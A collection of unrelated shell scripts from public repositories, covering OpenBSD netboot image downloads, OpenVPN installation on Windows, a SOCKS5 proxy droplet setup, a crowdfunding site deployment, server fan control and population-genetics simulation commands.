# release. A 'boot.conf' and 'random.seed' file will be created inside
# the 'etc' directory. Activating a specific version will be a matter of
# symlinking the release's etc directory to the root of the tftp tree.
#
################################################################################
# Define some variables
ARCH_LIST="amd64"; # Placeholder for the list of architectures to download
FIRMWARE_LIST=""; # Placeholder for the list of firmware to download
RELEASE_LIST=""; # Placeholder for the list of releases to download
CUSTOM_RELEASE_LIST=0; # Flag to denote that we have a custom release list
DEBUG=0; # Turn on debugging output
ERROR=0; # Error flag used during argument processing
VERBOSE=0; # Turn on verbose output
PRUNE=0; # Prune old releases
OSNAME="openbsd"; # Operating system name
WGET_VERBOSE="--quiet"; # Placeholder for wget verbosity
# User and group who will own the downloaded image files
USER="tftp"
GROUP="tftp"
# List of image related files to download
IMAGE_FILES="pxeboot bsd.rd"
# Poth to the directory where the netboot files will be stored
PKGDIR="/srv/tftp/packages"
# Logging macro
LOGGER="/usr/bin/logger -it \"$(basename $0)\""
# Get the list of active OpenBSD releases
RELEASE_LIST=$(wget -qO - http://ftp.openbsd.org/pub/OpenBSD | \
grep "href=\"[0-9]" | sed -e 's/^.*">//' -e 's/\/<.*//' | \
grep "^[0-9]" | sort -u | sed -e ':a;N;$!ba;s/\n/ /g')
# debug - helper routine to print debugging messages
debug() {
if [ "${DEBUG}" -eq 1 ]; then
echo "debug: $*"
fi
}
# error - helper routine to print error messages
error() {
${LOGGER} "error: $*"
echo "error: $*"
}
# notice - helper routine to print informational messages
notice() {
${LOGGER} "notice: $*"
if [ "${VERBOSE}" -eq 1 ]; then
echo "notice: $*"
fi
}
# usage - how to use this script
usage() {
echo "Usage: $0 [ OPTIONS ]"
echo ""
echo "Where:"
echo " -a [ ARCH ] Architecture to download netboot files for"
echo " (default: ${ARCH_LIST})"
echo " -d Print debugging output (includes -v too)"
echo " -g [ GROUP ] Group that should own the netboot files"
echo " (default: ${GROUP})"
echo " -h Print this message"
echo " -o [ OWNER ] Username that should own the netboot files"
echo " (default: ${USER})"
echo " -p [ DIR ] Root path to store the netboot files"
echo " (default: ${PKGDIR})"
echo " -P Prune EOL releases"
echo " -r [ RELEASE ] Operating sytem release to download"
echo " (default: ${RELEASE_LIST})"
echo " -v Print more verbose output"
exit 1
}
# Parse command-line arguments
while getopts "a:dhg:r:o:p:Pv" OPTION
do
case $OPTION in
a)
ARCH_LIST=$(echo $OPTARG | tr '[:upper:]' '[:lower:]');;
d)
DEBUG=1
VERBOSE=1
PROGRESS="--progress"
;;
g)
GROUP=$OPTARG;;
o)
USER=$OPTARG;;
p)
PKGDIR=${OPTARG};;
P)
PRUNE=1;;
r)
RELEASE_LIST=$(echo $OPTARG | tr '[:upper:]' '[:lower:]')
CUSTOM_RELEASE_LIST=1
;;
v)
VERBOSE=1
WGET_VERBOSE="--progress=bar"
;;
?)
usage;;
esac
done
# Make sure we have what we need
if [ "${ARCH_LIST}" == "" ]; then
error "Must specify an architecture type (-a)"
ERROR=1
fi
if [ "${RELEASE_LIST}" == "" ]; then
error "Must specify a release (-r)"
ERROR=1
fi
if [ ${ERROR} -eq 1 ]; then
usage
exit 1; # Should never get here
fi
# Debugging output
debug "ARCH_LIST = ${ARCH_LIST}"
debug "RELEASE_LIST = ${RELEASE_LIST}"
debug "USER = ${USER}"
debug "GROUP = ${GROUP}"
debug "PATH = ${PKGDIR}"
# Ensure our package directory exists
mkdir -p "${PKGDIR}"
chmod -R u-wx,u+rwX,go-rwx "${PKGDIR}"
# Release loop: Iterate over the list of releases
for RELEASE in ${RELEASE_LIST}
do
debug "Getting netboot images for ${RELEASE}"
# Architecture loop: Iterate over the list of architectures
for ARCH in ${ARCH_LIST}
do
# Download the image files for this release and architecture
debug "Getting netboot images for ${RELEASE} ${ARCH}"
# Source path to the netboot images
IMAGE_SRC="http://ftp.openbsd.org/pub/OpenBSD/${RELEASE}/${ARCH}"
# Destination path for the release images
RELEASE_DIR="${PKGDIR}/${OSNAME}/${RELEASE}/${ARCH}"
# Create the destination directory for the release image
debug "Creating '${RELEASE_DIR}'"
mkdir -p "${RELEASE_DIR}"
# Image loop: Iterate over the list of image files
for IMAGE_FILE in ${IMAGE_FILES}
do
debug "Dowloading ${IMAGE_FILE} for ${RELEASE} ${ARCH}"
# Download the image file
notice "Downloading '${IMAGE_SRC}/${IMAGE_FILE}'"
wget "${WGET_VERBOSE}" \
-O "${RELEASE_DIR}/${IMAGE_FILE}" "${IMAGE_SRC}/${IMAGE_FILE}"
if [ "${IMAGE_FILE}" == "pxeboot" ]
then
mv "${RELEASE_DIR}/${IMAGE_FILE}" \
"${RELEASE_DIR}/${IMAGE_FILE}.0"
fi
done; # Image loop
# Create the /etc directory
notice "Creating /etc directory for ${RELEASE} ${ARCH}"
if [ ! -d "${RELEASE_DIR}/etc" ]
then
mkdir "${RELEASE_DIR}/etc"
fi
# Create the boot.conf file
notice "Creating boot.conf for ${RELEASE} ${ARCH}"
echo "set image packages/openbsd/${RELEASE}/amd64/bsd.rd" \
> "${RELEASE_DIR}/etc/boot.conf"
# Create the random.seed file
notice "Creating random.seed for ${RELEASE} ${ARCH}"
dd if=/dev/random of="${RELEASE_DIR}/etc/random.seed" \
bs=512 count=1 status=noxfer
done; # Architecture loop
done; # Release loop
# Set owner and permissions on the directories and files
chown -R ${USER}:${GROUP} "${PKGDIR}/${OSNAME}"
chmod -R go-rwx "${PKGDIR}/${OSNAME}"
chmod -R u+rwX "${PKGDIR}/${OSNAME}"
# Prune directories not part of the current release list
if [ ${CUSTOM_RELEASE_LIST} -eq 0 ] && [ ${PRUNE} -eq 1 ]; then
EOL_RELEASES=$(find "${PKGDIR}/${OSNAME}/"* -type d -prune \
-exec basename {} \; | sort -u | \
sed -e ':a;N;$!ba;s/\n/ /g')
for RELEASE in ${RELEASE_LIST}
do
EOL_RELEASES=$(echo "${EOL_RELEASES}" | sed -e "s/${RELEASE}//")
done
debug "EOL_RELEASES = '${EOL_RELEASES}'"
for EOL_RELEASE in ${EOL_RELEASES}
do
notice "Cleaning up EOL/EOS release '${EOL_RELEASE}'"
rm -rf "${PKGDIR}/${OSNAME}/${EOL_RELEASE}"
done
fi
| true |
80d102293d185b09b4e7dfe269c0c6d1f840aa04 | Shell | darkshellcode/bash-progress-indicator | /main.sh | UTF-8 | 372 | 3.15625 | 3 | [
"MIT"
] | permissive | #!/bin/bash -e
# shellcheck disable=SC1091
declare -rx STEPS=(
'pre-install'
'install'
'post-install'
)
declare -rx CMDS=(
'sleep 1'
'sleep 1'
'sleep 1'
)
case $1 in
progress)
. 'progress.sh'
;;
progress_advanced)
. 'progress_advanced.sh'
;;
spinner*)
. 'spinner.sh'
;;
*)
echo "Invalid option $1!"
exit 1
esac
start
| true |
405e8bbd6e656d0b59dbd570d2d439eef5316c26 | Shell | c0ns0le/bootstrap | /openvpn.sh | UTF-8 | 1,289 | 2.953125 | 3 | [] | no_license | #!/bin/sh
set -e -x
if [ -d /cygdrive/c/Program\ Files/OpenVPN ]; then
echo 'openvpn already installed?'
exit 0
fi
# vzdy aktualni verze na (stahuj verzi pro xp): https://openvpn.net/index.php/open-source/downloads.html
# TODO: pak to musime opravit, protoze to nefunguje (pozor jeste na jiny driver pro win8)
#if [ "`uname -a | grep WOW64`" ]; then
EXE='openvpn-install-2.3.7-I002-x86_64.exe'
#else
# EXE='openvpn-install-2.3.7-I002-i686.exe'
#fi
wget -c --tries=10 http://swupdate.openvpn.org/community/releases/$EXE
chmod a+x $EXE
echo
echo '!!! TED TO ASI VYBLIJE HLASKU O DUVERYHODNOSTI - POTVRD TO! !!!'
./$EXE /S
rm $EXE
rm -f /cygdrive/c/Users/Public/Desktop/OpenVPN*lnk || true
IFACE=`/cygdrive/c/Program\ Files/OpenVPN/bin/openvpn.exe --show-adapters | tail -n 1 | cut -f 2 -d"'"`
netsh interface set interface "$IFACE" newname = "asterix_openvpn"
/cygdrive/c/atxpkg/atxpkg install openvpn-asterix --yes
sc config OpenVPNService start= auto
sc failure "OpenVPNService" actions= restart/600000/restart/600000/restart/600000 reset= 86400
net start OpenVPNService
echo
echo '!!! CEKAM 10s !!!'
sleep 10
echo
echo '!!! ZKONTROLUJ ADRESU !!!'
netsh int ip show addresses asterix_openvpn
netsh int ipv6 show addresses asterix_openvpn
schtasks /delete /tn "OpenVPN" /f || true
| true |
10e6085cc4fbf216183b38c68e99cf0822713755 | Shell | woodruffw/snippets | /rip/rip | UTF-8 | 713 | 4.15625 | 4 | [
"LicenseRef-scancode-proprietary-license",
"MIT"
] | permissive | #!/usr/bin/env bash
# rip: quick rip an audio CD into a specified format using abcde
function installed() {
cmd=$(command -v "${1}")
[[ -n "${cmd}" ]] && [[ -f "${cmd}" ]]
return ${?}
}
function fatal {
>&2 echo "Fatal: ${*}"
exit 2
}
[[ -n "${1}" ]] || fatal "Usage: $(basename "${0}") <format>"
installed abcde || fatal "Missing abcde for ripping."
format=$(echo "${1}" | tr "[:upper:]" "[:lower:]")
case "${format}" in
"mp3" ) installed lame || fatal "Missing lame for MP3 encoding." ;;
"flac" ) installed flac || fatal "Missing flac for FLAC encoding." ;;
* ) fatal "Unsupported format: ${format}. Maybe use abcde directly?"
esac
abcde -Vx -a "cddb,read,encode,tag,move,clean" -o "${format}"
| true |
ea87885615ceefe72655ae9183ec5836943ad33c | Shell | rulorules99/angular-scaffolding | /init_repo | UTF-8 | 259 | 2.921875 | 3 | [] | no_license | #!/usr/bin/env bash
[[ $# -eq 0 ]] && { echo 'you must supply a repo path' ; exit 0; } || repo=$1
sudo rm -r .git
git init
git add -A
git commit -m "first commit"
git remote add origin $repo
git push -u origin master
rm ./.travis.yml
rm ./init_repo
exit 1 | true |
33db69cce4fba7abc94ce39c69aaa96637a7a3e6 | Shell | ramonpichardo/scripts-bash | /nfs-share-setup-macos.sh | UTF-8 | 432 | 3.546875 | 4 | [] | no_license | #!/usr/bin/env bash
# Enable an NFS share on a Mac
# Run this script with elevated privileges (i.e., sudo or as root)
# 1. Create a file named "exports" in directory /etc:
touch /etc/exports
# 2. Add the following string to the file /etc/exports:
echo "/Volumes/Storage02/video -network 192.168.0.0 -mask 255.255.255.0" > /etc/exports
# 3. Enable NFS:
nfsd enable
# 4. Verify which folders are being shared by NFS:
showmount -e
| true |
9b03b38928a0a99fe460e0dff3aeb98113bc9642 | Shell | gundour/ssh_socks5_droplet | /start.sh | UTF-8 | 2,087 | 3.8125 | 4 | [] | no_license | #!/bin/bash
# Start a new droplet to be used as a socks5 proxy machine
# Prerequisites
# 1- generate API token and login with the generated token
# 2- install "doctl" locally
# Token String
# Uncomment the following line to use this script with API Token
# ssh private key path
SSH_KEY_NAME="socks5"
SSH_KEY_PATH=~/.ssh/${SSH_KEY_NAME}_key
# Machine sizes can be optained by running this command in terminal.
# $ doctl compute size list
size="s-1vcpu-1gb"
# Configure image type or use a snapshot
# Available images can be optained by running this command in terminal.
# $ doctl compute image list --public
image="ubuntu-16-04-x64"
# Configure Region
# Available regions can be optained by running this command in terminal.
# $ doctl compute region list
region="nyc1"
# Image name
droplet_name="socks5-machine"
# Create new ssh key and add the key to user account
# echo "Creating new ssh key"
#
ssh-keygen -t rsa -b 4096 -f $SSH_KEY_PATH -q -N "" # create new ssh key
SSH_KEY_DATA="$(doctl compute ssh-key create $SSH_KEY_NAME --public-key "$(cat $SSH_KEY_PATH.pub)" \
--format Name,FingerPrint | grep $SSH_KEY_NAME)"
echo "${SSH_KEY_DATA}"
SSH_key_FingerPrint=${SSH_KEY_DATA#$SSH_KEY_NAME } # created ssh key fingerprint
# Start the droplet
echo "Starting new droplet"
doctl compute droplet create $droplet_name --size $size --image $image \
--region $region --ssh-keys $SSH_key_FingerPrint --wait
droplet_data="$(doctl compute droplet list --format Name,PublicIPv4 | grep $droplet_name)"
echo "${droplet_data}"
droplet_ip=${droplet_data#$droplet_name } # droplet public ip
###########################################################################################
###########################################################################################
###########################################################################################
# Socks5 proxy configuration
echo "Socks5 Connect"
PORT=8123
echo "ssh -i $SSH_KEY_PATH -D $PORT -q -f -C -N -y root@$droplet_ip"
ssh -i $SSH_KEY_PATH -D $PORT -q -f -C -N root@$droplet_ip
ps aux | grep ssh
| true |
beb7eeab21998a874e3f849cbe1944ee51aeb196 | Shell | cash2one/crf_test | /crf_test/readme_lucheng.sh | UTF-8 | 3,697 | 2.96875 | 3 | [] | no_license | 本文档主要对韵律模型训练流程进行简单说明
第一步:处理语料
在该步骤,需要提供手工标注的韵律训练语料,并按照统一的格式存储在train_corpus.txt中。具体格式样例如下:
姜 还是 老的辣$一位 教|社会学的 老师$打了 个|幽默的 比喻 说
一千|四百 二十一 语丝$不惜|牺牲 自由$以图 苟安的 人
魏格登 先生$每听到|前门的 小铃$发出|轻微的|叮当声
其中,空格表示韵律词结尾,|符号表示次韵律短语结尾(二级韵律短语结尾),
$符号表示主韵律短语结尾(一级韵律短语结尾)。句尾不需要标记,直接回车。
特别注意,该语料不能有多余的空格。
此外,除了上述符号及相应的汉字文本外,不能包含其它符号(标点符号已经过滤,所有阿拉伯数字、特殊符号已经经过正则化处理)。
除了上述文本语料外,另需准备train_corpus_tagged.txt文件,
按照与train_corpus.txt逐行对应的方式存储相应训练语料的分词、词性标注结果。
该分词过程可以采用任意分词工具,词性标注符号也没有限制。只是要注意训练过程采用的工具及使用过程采用的工具要统一。
准备好上述工具后,依照顺序分别执行step1.py至step4.py
(需要采用python3.2以上版本,本人在windows下测试通过)。
执行完毕后,即可生成三个训练文件:pw_train.txt,pp_train.txt,ip_train.txt,用于训练crf模型。
其中pw,pp,ip分别对应韵律词、二级韵律短语、一级韵律短语
第二步:模型训练
首先安装crfpp工具(linux环境下)。
安装完毕后,新建训练文件夹,并将训练语料pw_train.txt,pp_train.txt,ip_train.txt拷入该文件夹。
同时,将“第二步_训练模型”文件夹下的模板“template_pp”及“template_pp”也拷入该文件夹。执行如下过程
LD_LIBRARY_PATH=/usr/local/lib:$LD_LIBRARY_PATH
export LD_LIBRARY_PATH
./crf_learn -c 4.0 -f 5 -t template_pw pw_train.txt model_pw
./crf_learn -c 4.0 -f 5 -t template_pp pp_train.txt model_pp
./crf_learn -c 4.0 -f 3 -t template_pp ip_train.txt model_ip
其中,pp及ip的训练过程采用同一个模板文件。
训练完成后,会生成相应的模型文件。
我们须保留相应的文本格式版本,分别命名为model_pw.txt,model_pp.txt,model_ip.txt,该文件经过后续格式处理后,即可在引擎中使用。
第三步:模型后处理
上述过程生成的文件格式存在冗余,我们消除冗余后,按照自定义的方式进行存储,即可在引擎中使用。
该过程采用postprocess.py工具。我们可以看到model_pw.txt,model_pp.txt,model_ip.txt三个文件大体格式分为如下部分:
version: 100
cost-factor: 1
maxid: 42044
xsize: 5
0
1
U00:%x[-2,0]
U01:%x[-1,0]
........
0 U00:_B-1
2 U00:_B-2
4 U00:啊
6 U00:阿
........
0.1846607464257579
-0.1846607464258724
0.2134598654958623
-0.2134598654960214
..............
我们手工的把上述文件拆成两部分,分别对应temp1.txt和temp2.txt。
其中,temp1.txt对应如下部分:
0 U00:_B-1
2 U00:_B-2
4 U00:啊
6 U00:阿
........
temp2.txt对应如下部分:
0.1846607464257579
-0.1846607464258724
0.2134598654958623
-0.2134598654960214
..............
即,temp1.txt对应所有的特征信息,temp2.txt对应相应的特征权重。
此时,执行postprocess.py,即可生成generated_model.txt,该模型就是当前引擎支持的模型结构,修改文件名后即可在引擎中使用。
| true |
027a81d1e1379c36a2a42a0ac7b8bdeb831a4e59 | Shell | macintacos/dotfiles | /setup/macos/arc | UTF-8 | 387 | 2.515625 | 3 | [] | no_license | #!/usr/bin/env bash
export PATH="$PWD/setup:$PATH"
log info "Updating Arc-related metadata..."
log info "Make sure that Keyboard Maestro recognizes Arc"
(
defaults write com.stairways.keyboardmaestro.engine AppleScriptGoogleChromeBundleID -string "company.thebrowser.Browser"
defaults write com.stairways.keyboardmaestro.engine BrowserGoogleChromeName -string "Arc Browser"
)
| true |
c95635a842e0fd4a4611da9d29068170a9e79cf3 | Shell | yugeta/cympfh.github.io | /c++/bin/cpp2html | UTF-8 | 149 | 2.578125 | 3 | [] | no_license | #!/bin/bash
TMPMD=/tmp/cpphtml.md
echo > $TMPMD
echo "\`\`\`cpp" >> $TMPMD
cat $1 >> $TMPMD
echo "\`\`\`" >> $TMPMD
pandoc -s -i $TMPMD -o $1.html
| true |
e4534307a0b70ca33e5557d4d396e976b70d73f4 | Shell | particl/ccs-setup | /setup.sh | UTF-8 | 5,973 | 3.03125 | 3 | [] | no_license | echo "CROWDFUNDING SETUP SCRIPT"
echo "[*] INSERT HOSTNAME (e.g crowdfund.particl.io)"
read HOSTNAME
HOSTNAME=${HOSTNAME:-localhost}
echo "[*] INSERT FRONT REPO URL (e.g https://github.com/particl/ccs-front)"
read FRONT_REPO_URL
FRONT_REPO_URL=${FRONT_REPO_URL:-https://github.com/kewde/ccs-front}
echo "$FRONT_REPO_URL"
# Check if the directory exist, else clone it.
D=./data/nginx/ccs-front
if [ -f "$D" ]; then
echo "$D already exists, aborting."
exit
else
echo "[*] CLONING FRONTEND REPO"
git clone "$FRONT_REPO_URL" "$D"
fi
echo "[*] INSERT BACK REPO URL (e.g https://github.com/particl/ccs-back)"
read BACK_REPO_URL
BACK_REPO_URL=${BACK_REPO_URL:-https://github.com/kewde/ccs-back}
# Check if the directory exist, else clone it.
D=./data/nginx/ccs-back
if [ -f "$D" ]; then
echo "$D already exists, aborting."
exit
else
echo "[*] CLONING BACKEND REPO"
git clone "$BACK_REPO_URL" "$D"
fi
echo "[*] INSERT PROPOSALS REPO URL (e.g https://github.com/particl/ccs-proposals)"
read PROP_REPO_URL
PROP_REPO_URL=${PROP_REPO_URL:-https://github.com/kewde/ccs-proposals}
# Check if the directory exist, else clone it.
D=./data/nginx/ccs-back/storage/app/proposals
if [ -f "$D" ]; then
echo "$D already exists, aborting."
exit
else
echo "[*] CLONING PROPOSAL REPO"
git clone "$PROP_REPO_URL" "$D"
fi
echo "[*] INSERT GITHUB USERNAME (e.g kewde)"
read GITHUB_USERNAME
GITHUB_USERNAME=${GITHUB_USERNAME:-kewde}
echo "[*] INSERT GITHUB ACCESS TOKEN (retrieve 'repo' token from GitHub: https://github.com/settings/tokens/new)"
read GITHUB_ACCESS_TOKEN
GITHUB_ACCESS_TOKEN=${GITHUB_ACCESS_TOKEN:-SECRET}
echo "[*] INSERT DB BACKUP REPO URL WIHTOUT HTTPS:// (e.g github.com/particl/ccs-db)"
read BACKUP_REPO_URL
BACKUP_REPO_URL=${BACKUP_REPO_URL:-github.com/kewde/ccs-db}
# Check if the directory exist, else clone it.
D=./data/nginx/ccs-db
if [ -f "$D" ]; then
echo "$D already exists, aborting."
exit
else
echo "[*] CLONING BACKUP REPO"
git clone "https://${GITHUB_USERNAME}:${GITHUB_ACCESS_TOKEN}@$BACKUP_REPO_URL" "$D"
fi
echo "[*] GENERATE SECRETS"
echo " [*] GENERATING MYSQL ROOT PASSWORD"
MYSQL_ROOT_PASSWORD=$(tr -dc '[:alnum:]' < /dev/urandom | head -c20)
echo " MYSQL_ROOT_PASSWORD=${MYSQL_ROOT_PASSWORD}"
echo " [*] GENERATING MYSQL USER PASSWORD"
MYSQL_USER_PASSWORD=$(tr -dc '[:alnum:]' < /dev/urandom | head -c20)
echo " MYSQL_USER_PASSWORD=${MYSQL_USER_PASSWORD}"
echo " [*] GENERATING PARTICLD USER PASSWORD"
PARTICLD_USER_PASSWORD=$(tr -dc '[:alnum:]' < /dev/urandom | head -c20)
echo " PARTICLD_USER_PASSWORD=${PARTICLD_USER_PASSWORD}"
echo "[*] GENERATING CCS.ENV FILE"
cat >./ccs.env <<EOL
APP_URL=http://${HOSTNAME}
DB_CONNECTION=mysql
DB_HOST=mysql
DB_PORT=3306
DB_DATABASE=crowdfund
DB_USERNAME=crowdfunduser
DB_PASSWORD=${MYSQL_USER_PASSWORD}
RPC_URL=http://watcher-particl-core:51935/
RPC_USER=crowdfunduser
RPC_PASSWORD=${PARTICLD_USER_PASSWORD}
COIN=particl
REPOSITORY_URL=${PROP_REPO_URL}
GITHUB_ACCESS_TOKEN=${GITHUB_ACCESS_TOKEN}
EOL
echo "[*] GENERATING MYSQL.ENV FILE"
cat >./mysql.env <<EOL
MYSQL_ROOT_PASSWORD=${MYSQL_ROOT_PASSWORD}
MYSQL_DATABASE=crowdfund
MYSQL_USER=crowdfunduser
MYSQL_PASSWORD=${MYSQL_USER_PASSWORD}
EOL
echo "[*] GENERATING NGINX FILE"
cat >./ccs.nginx <<EOL
server {
listen 80 default_server;
listen [::]:80 default_server;
listen 443 ssl http2;
listen [::]:443 ssl http2;
root /var/www/html/ccs-front/_site/;
index index.php index.html;
server_name ${HOSTNAME};
ssl_certificate /etc/ssl/certs/ccs-https.crt;
ssl_certificate_key /etc/ssl/private/ccs-https.key;
ssl_protocols TLSv1.2 TLSv1.1 TLSv1;
location / {
try_files \$uri \$uri/ /index.php?$query_string;
}
# pass the PHP scripts to FastCGI server
#
location ~ \.php$ {
root /var/www/html/ccs-back/public/;
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php7.4-fpm.sock; # change to correct version
}
}
EOL
echo "[*] GENERATING SELF SIGNED TLS CERTIFICATES WHICH LAST 100 YEAR"
openssl req -x509 -nodes -days 36500 -newkey rsa:2048 -keyout ccs-https.key -out ccs-https.crt -subj "/C=GB/ST=London/L=London/O=Global Security/OU=IT Department/CN=${HOSTNAME}"
echo "[*] GENERATING PARTICLD CONF FILE"
cat >./data/particld/particl.conf <<EOL
rpcuser=crowdfunduser
rpcpassword=${PARTICLD_USER_PASSWORD}
rpcbind=0.0.0.0
rpcallowip=::/0
rpcport=51935
printtoconsole=1
EOL
echo "[*] GENERATING CRON FILE"
cat >./cron.py <<EOL
from subprocess import call, os
mysql_env = os.environ.copy()
mysql_env["MYSQL_PWD"] = "${MYSQL_ROOT_PASSWORD}"
import time
while True:
call(["git","-C","/var/www/html/ccs-front","pull"])
call(["git","-C","/var/www/html/ccs-back/storage/app/proposals/","pull"])
call(["php","/var/www/html/ccs-back/artisan","schedule:run"])
call(["jekyll","build","--source","/var/www/html/ccs-front","--destination","/var/www/html/ccs-front/_site"])
print("updated website to latest state")
call("/usr/bin/mysqldump -P 3306 -h mysql -u root crowdfund > /var/www/html/ccs-db/backup.sql", shell=True, env=mysql_env)
call("head -n -1 backup.sql > t.sql", shell=True, cwd="/var/www/html/ccs-db")
call(["mv","t.sql","backup.sql"], cwd="/var/www/html/ccs-db")
call(["git","add","."], cwd="/var/www/html/ccs-db")
call(["git","commit","-a","-m","\"db backup\""], cwd="/var/www/html/ccs-db")
call(["git", "push"], cwd="/var/www/html/ccs-db")
time.sleep(30)
EOL
echo "MANUAL: place wallet file in ./data/particld and hit enter"
read WALLET_ENTERED
FILE=./data/particld/wallet.dat
if [ -f "$FILE" ]; then
echo "$FILE exists."
else
echo "$FILE does not exist. Exiting."
exit
fi
touch data/nginx/ccs-back/storage/app/complete.json
touch data/nginx/ccs-back/storage/app/proposals.json
echo "[*] BUILDING DOCKER IMAGE"
docker build -t crowdfunding-backend -f crowdfunding.Dockerfile ./data/context
echo "[*] DONE!"
| true |
f66f04b72e8e2cb7ccde3d88429b7040270500d4 | Shell | ujjaldey/uWaiPi | /sources/startup.sh | UTF-8 | 1,920 | 2.734375 | 3 | [] | no_license | #!/bin/bash
# -*- coding: utf-8 -*-
###################################################################################################
# __ __ _ ____ _
# _ \ \ / /_ _(_) _ \(_)
# | | | \ \ /\ / / _` | | |_) | |
# | |_| |\ V V / (_| | | __/| |
# \__,_| \_/\_/ \__,_|_|_| |_|
#
# Copyright (c) 2016 Ujjal Dey
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software
# and associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
###################################################################################################
##############################################################################
# Script to start the applications. To be added in Crontab using: sudo crontab -e
##############################################################################
path=`realpath $0`
fileName=`basename ${0}`
path=`echo $path | sed "s/${fileName}/.configurePath/g"`
. ${path}
cd $UWAIPI_INSTALLATION_PATH
./loadOnStartup.sh
sleep 5
./keepRunning.sh &
| true |
996607a77ec6f4cd6efd4c004dee26ed653d6249 | Shell | gavin-su/thrift-bench | /client/calc_stdev.sh | UTF-8 | 262 | 3.265625 | 3 | [] | no_license | #!/bin/bash
LOGFILE=$1
RESULTFILE=stdev.$LOGFILE
cat $LOGFILE | grep -v err | grep used | awk '{printf "%0.2f\n", $2/1000}' >> $RESULTFILE
LINE=`wc -l $RESULTFILE | awk '{print $1}'`
if [ "${LINE}" -le "1" ]
then
exit 0
fi
./calc_stdev.py $RESULTFILE
| true |
093124786ecbb4907253c60903fc2bfbc194f80a | Shell | jmamma/r630 | /r630_fan.sh | UTF-8 | 1,497 | 3.296875 | 3 | [] | no_license | #!/bin/bash
SPEED_MIN=17.0
SPEED_HIGH=40.0
TEMP_MIN=75.0
TEMP_MAX=85.0
SCALAR=1.0
DELAYMAX=10
function to_int() {
echo $1 | cut -f1 -d '.'
}
ipmitool raw 0x30 0x30 0x01 0x00
TEMP_MIN_INT=$(to_int $TEMP_MIN)
auto=255
lastspeed=0
echo $TEMP_MAX_INT
while [ 1 ]; do
T1=$(sensors | grep "Package id 0" | awk '{ print $4 }' | awk '{print ($0+0)}')
T2=$(sensors | grep "Package id 1" | awk '{ print $4 }' | awk '{print ($0+0)}')
echo $T1 deg
echo $T2 deg
if [ -z $T1 ]; then
T1=100
fi
if [ -z $T2 ]; then
T2=$T1
fi
#SPEED_MAX=a(x-TEMP_MIN)^2 + speed_low
A=$(python3 -c "print(($SPEED_HIGH - $SPEED_MIN) / pow($TEMP_MAX - $TEMP_MIN, $SCALAR))")
if [[ $T1 -ge $TEMP_MIN_INT ]] || [[ $T2 -ge $TEMP_MIN_INT ]]; then
speed=$(python3 -c "print(int(min($SPEED_HIGH,$A * pow(max($T1,$T2) - $TEMP_MIN,$SCALAR)) + $SPEED_MIN))")
if [ $speed -lt $lastspeed ]; then
#delay_max=$(python3 -c "print(int(($DELAYMAX / ($lastspeed - $speed))))")
delay_max=$DELAYMAX
echo "here" $(($(date +%s) - $last_time))
if [ $(($(date +%s) - $last_time)) -lt $delay_max ]; then
echo "wait $delay_max"
else
ipmitool raw 0x30 0x30 0x02 0xFF $speed
lastspeed=$speed
last_time=$(date +%s)
fi
else
echo Setting speed $speed
ipmitool raw 0x30 0x30 0x02 0xFF $speed
lastspeed=$speed
last_time=$(date +%s)
fi
else
echo "Setting lowest speed"
ipmitool raw 0x30 0x30 0x02 0xFF $(to_int $SPEED_MIN)
fi
done
ipmitool raw 0x30 0x30 0x01 0x01
| true |
ef2524b62208fc75a2d558cb9141a6c1a225137f | Shell | skyclub3/scct | /simulation_scripts/simulation/demography/structure/1.structure.sh | UTF-8 | 1,206 | 2.59375 | 3 | [
"LicenseRef-scancode-other-permissive"
] | permissive | # Simulate the structure model of YRI.
# Ne = 100000, u = 1.5 * 10^-8, r = 1.3 * 10^-8. L = 3m.
# theta = 4*Ne*u*L = 4*100000*1.5*10^-8*3*10^6 = 18000
# p = 4*Ne*r*L = 4 * 100000 * 1.3 * 10^-8 * 3 * 10^6 = 15600
# AF expansion:
# 200g/(4*100000) = 0.0005
# Ne_Africa_before expansion 24000 = 0.24
# EU expansion:
# 350/(4*100000) = 0.000875
# Ne_European_before expansion 7700 = 0.077
# EU out of africa: 3500/(4*100000) = 0.00875
# African ancestral expansion:
# 17000/(4*100000) = 0.0425
# Ne_before expansion: 12500 = 0.125
# 3pop substructure of YRI population.
# Time: 0g - 1000g: 0 - 0.0025
# Migration coefficient between sub-pop, 0 10 100.
# 0.24/4 = 0.06
ss="0 10 100"
for s in ${ss}
do
#b=`echo "${s}*0.24" | bc -l`
echo "java -jar -Xmx30G ~/scct/msms.jar 240 300 -t 18000 -r 15600 -N 100000 -I 5 30 30 30 30 120 ${s} -m 1 5 0 -m 5 1 0 -m 2 5 0 -m 5 2 0 -m 3 5 0 -m 5 3 0 -m 4 5 0 -m 5 4 0 -en 0 1 0.25 -en 0 2 0.25 -en 0 3 0.25 -en 0 4 0.25 -en 0.0005 1 0.06 -en 0.0005 2 0.06 -en 0.0005 3 0.06 -en 0.0005 4 0.06 -ej 0.0025 4 1 -ej 0.0025 3 1 -ej 0.0025 2 1 -en 0.0025 1 0.24 -en 0.000875 5 0.077 -ej 0.00875 5 1 -en 0.0425 1 0.125 -threads 10 | gzip > AFR_CEU.sub.${s}.gz"
done
| true |
59152af36801e157bd2ae5a34822ff52401d118b | Shell | datenlord/datenlord | /scripts/datenlord_metrics_logging_test.sh | UTF-8 | 856 | 2.859375 | 3 | [
"MIT"
] | permissive | #! /bin/sh
set -o errexit
set -o nounset
set -o xtrace
# Need to wait for some time before metrics are collected by Promethues
PROMETHUES_WAIT_TIME=5
NGINX_VERSION="1.21.5"
# Datanlord metrics test
docker pull nginx:${NGINX_VERSION}
kind load docker-image nginx:${NGINX_VERSION}
